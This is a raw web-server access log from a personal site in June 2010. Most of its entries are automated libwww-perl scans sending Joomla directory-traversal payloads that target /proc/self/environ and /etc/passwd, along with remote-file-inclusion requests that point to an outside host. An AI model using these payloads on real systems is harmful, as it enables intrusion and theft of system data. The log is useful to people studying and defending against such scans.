64.34.165.224 - - [29/Jun/2010:04:50:20 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
204.122.16.64 - - [29/Jun/2010:04:50:33 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.76"
204.122.16.64 - - [29/Jun/2010:04:50:33 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.76"
204.122.16.64 - - [29/Jun/2010:04:50:33 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.76"
64.34.165.224 - - [29/Jun/2010:04:51:00 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:04:51:22 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
204.122.16.64 - - [29/Jun/2010:04:51:27 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.76"
64.34.165.224 - - [29/Jun/2010:04:51:27 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:04:51:33 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:04:51:33 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
91.121.75.82 - - [29/Jun/2010:04:54:02 -0500] "GET /logs/access_log.1274572800//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.75.82 - - [29/Jun/2010:04:54:02 -0500] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.75.82 - - [29/Jun/2010:04:54:03 -0500] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
64.34.165.224 - - [29/Jun/2010:04:56:12 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:04:56:50 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:04:57:18 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:04:57:23 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
183.89.37.126 - - [29/Jun/2010:04:58:03 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://www.google.co.th/imglanding?q=vintage%20tattoo&imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://zamyr.freeblogshost.in/100505/&usg=__1mG3OtpgaCMTnxr5Z1ItIYzZU3s=&h=364&w=405&sz=67&hl=th&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%26start%3D36%26um%3D1%26hl%3Dth%26sa%3DN%26ndsp%3D18%26tbs%3Disch:1&start=45&um=1&sa=N&ndsp=18&tbs=isch:1""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; AskTB5.6)"
194.42.16.25 - - [29/Jun/2010:04:59:47 -0500] "GET /logs/access_log.1274572800//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
194.42.16.25 - - [29/Jun/2010:04:59:47 -0500] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
194.42.16.25 - - [29/Jun/2010:04:59:47 -0500] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
194.42.16.25 - - [29/Jun/2010:05:00:54 -0500] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.66.157.210 - - [29/Jun/2010:05:02:04 -0500] "GET /bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.805"
195.66.157.210 - - [29/Jun/2010:05:02:04 -0500] "GET /bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.805"
216.17.105.143 - - [29/Jun/2010:05:02:42 -0500] "GET /bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.830"
64.34.165.224 - - [29/Jun/2010:05:02:50 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
91.121.75.82 - - [29/Jun/2010:05:02:51 -0500] "GET /logs/access_log.1274054400//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
64.34.165.224 - - [29/Jun/2010:05:04:02 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
87.229.114.18 - - [29/Jun/2010:05:05:24 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
87.229.114.18 - - [29/Jun/2010:05:05:24 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
87.229.114.18 - - [29/Jun/2010:05:05:24 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
208.115.111.248 - - [29/Jun/2010:05:06:19 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:05:06:20 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:05:06:23 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:05:06:25 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3962 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:05:06:27 -0500] "GET /logs/access_log.1219536000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:05:06:28 -0500] "GET /logs/access_log.1219622400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:05:06:30 -0500] "GET /logs/access_log.1219708800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:05:06:32 -0500] "GET /logs/access_log.1219881600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
64.34.165.224 - - [29/Jun/2010:05:06:34 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
208.115.111.248 - - [29/Jun/2010:05:06:34 -0500] "GET /logs/access_log.1220054400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
64.34.165.224 - - [29/Jun/2010:05:06:36 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
208.115.111.248 - - [29/Jun/2010:05:06:37 -0500] "GET /logs/access_log.1220140800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:05:06:39 -0500] "GET /logs/access_log.1220313600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
64.34.165.224 - - [29/Jun/2010:05:06:40 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
208.115.111.248 - - [29/Jun/2010:05:06:41 -0500] "GET /logs/access_log.1220400000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:05:06:43 -0500] "GET /logs/access_log.1220572800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
64.34.165.224 - - [29/Jun/2010:05:06:56 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:06:59 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
208.115.111.248 - - [29/Jun/2010:05:07:02 -0500] "GET /logs/access_log.1220745600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
64.34.165.224 - - [29/Jun/2010:05:07:03 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
87.229.114.18 - - [29/Jun/2010:05:07:05 -0500] "GET /logs/access_log.1275264000//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
64.34.165.224 - - [29/Jun/2010:05:07:35 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
204.122.16.64 - - [29/Jun/2010:05:07:54 -0500] "GET /option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 382 "-""libwww-perl/5.76"
64.34.165.224 - - [29/Jun/2010:05:07:55 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
204.122.16.64 - - [29/Jun/2010:05:08:05 -0500] "GET /logs/access_log.1274832000/option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 409 "-""libwww-perl/5.76"
204.122.16.64 - - [29/Jun/2010:05:08:05 -0500] "GET /option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 382 "-""libwww-perl/5.76"
204.122.16.64 - - [29/Jun/2010:05:08:05 -0500] "GET /logs/option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.76"
195.66.157.210 - - [29/Jun/2010:05:08:26 -0500] "GET /logs/access_log.1276300800/bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""libwww-perl/5.805"
195.66.157.210 - - [29/Jun/2010:05:08:26 -0500] "GET /logs/access_log.1276300800/bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""libwww-perl/5.805"
195.66.157.210 - - [29/Jun/2010:05:08:26 -0500] "GET /bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.805"
195.66.157.210 - - [29/Jun/2010:05:08:26 -0500] "GET /bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.805"
195.66.157.210 - - [29/Jun/2010:05:08:26 -0500] "GET /logs/bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
195.66.157.210 - - [29/Jun/2010:05:08:27 -0500] "GET /logs/bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.121.64.99 - - [29/Jun/2010:05:08:45 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.64.99 - - [29/Jun/2010:05:08:46 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.64.99 - - [29/Jun/2010:05:08:46 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
201.116.197.150 - - [29/Jun/2010:05:09:10 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
201.116.197.150 - - [29/Jun/2010:05:09:10 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
201.116.197.150 - - [29/Jun/2010:05:09:11 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
64.34.165.224 - - [29/Jun/2010:05:11:26 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
204.122.16.64 - - [29/Jun/2010:05:11:33 -0500] "GET /logs/access_log.1277164800/option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 409 "-""libwww-perl/5.76"
216.17.105.143 - - [29/Jun/2010:05:11:53 -0500] "GET /logs/access_log.1276300800/bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""libwww-perl/5.830"
216.17.105.143 - - [29/Jun/2010:05:11:53 -0500] "GET /bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.830"
216.17.105.143 - - [29/Jun/2010:05:11:53 -0500] "GET /logs/bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.830"
194.42.16.25 - - [29/Jun/2010:05:12:54 -0500] "GET /logs/access_log.1274054400//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.34.165.224 - - [29/Jun/2010:05:14:56 -0500] "GET /logs/access_log.1276732800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:14:59 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:15:02 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:18:16 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:18:17 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:18:18 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:18:20 -0500] "GET /logs/access_log.1274054400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:18:20 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:18:21 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:19:21 -0500] "GET /logs/access_log.1276732800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:19:23 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:19:24 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:20:15 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:20:16 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:20:16 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:20:35 -0500] "GET /logs/access_log.1274054400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:20:36 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:20:36 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:22:19 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:22:28 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:22:28 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:22:28 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
201.116.197.150 - - [29/Jun/2010:05:22:51 -0500] "GET /logs/access_log.1275264000//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
67.195.112.180 - - [29/Jun/2010:05:23:20 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [29/Jun/2010:05:23:21 -0500] "GET /artwork/llpostcards.htm HTTP/1.0" 200 1147 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
219.240.36.36 - - [29/Jun/2010:05:23:32 -0500] "GET /logs/access_log.1275696000///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.65"
219.240.36.36 - - [29/Jun/2010:05:23:33 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
219.240.36.36 - - [29/Jun/2010:05:23:33 -0500] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.65"
64.34.165.224 - - [29/Jun/2010:05:23:42 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:23:43 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:23:43 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
219.240.36.36 - - [29/Jun/2010:05:24:10 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
64.34.165.224 - - [29/Jun/2010:05:24:11 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:24:11 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:24:11 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:24:35 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:24:35 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:24:35 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:24:43 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:24:43 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:24:44 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:25:36 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:25:36 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:25:36 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:25:46 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:25:56 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:26:34 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:26:34 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:26:34 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:26:43 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:26:43 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:26:43 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:26:52 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:27:36 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:27:58 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
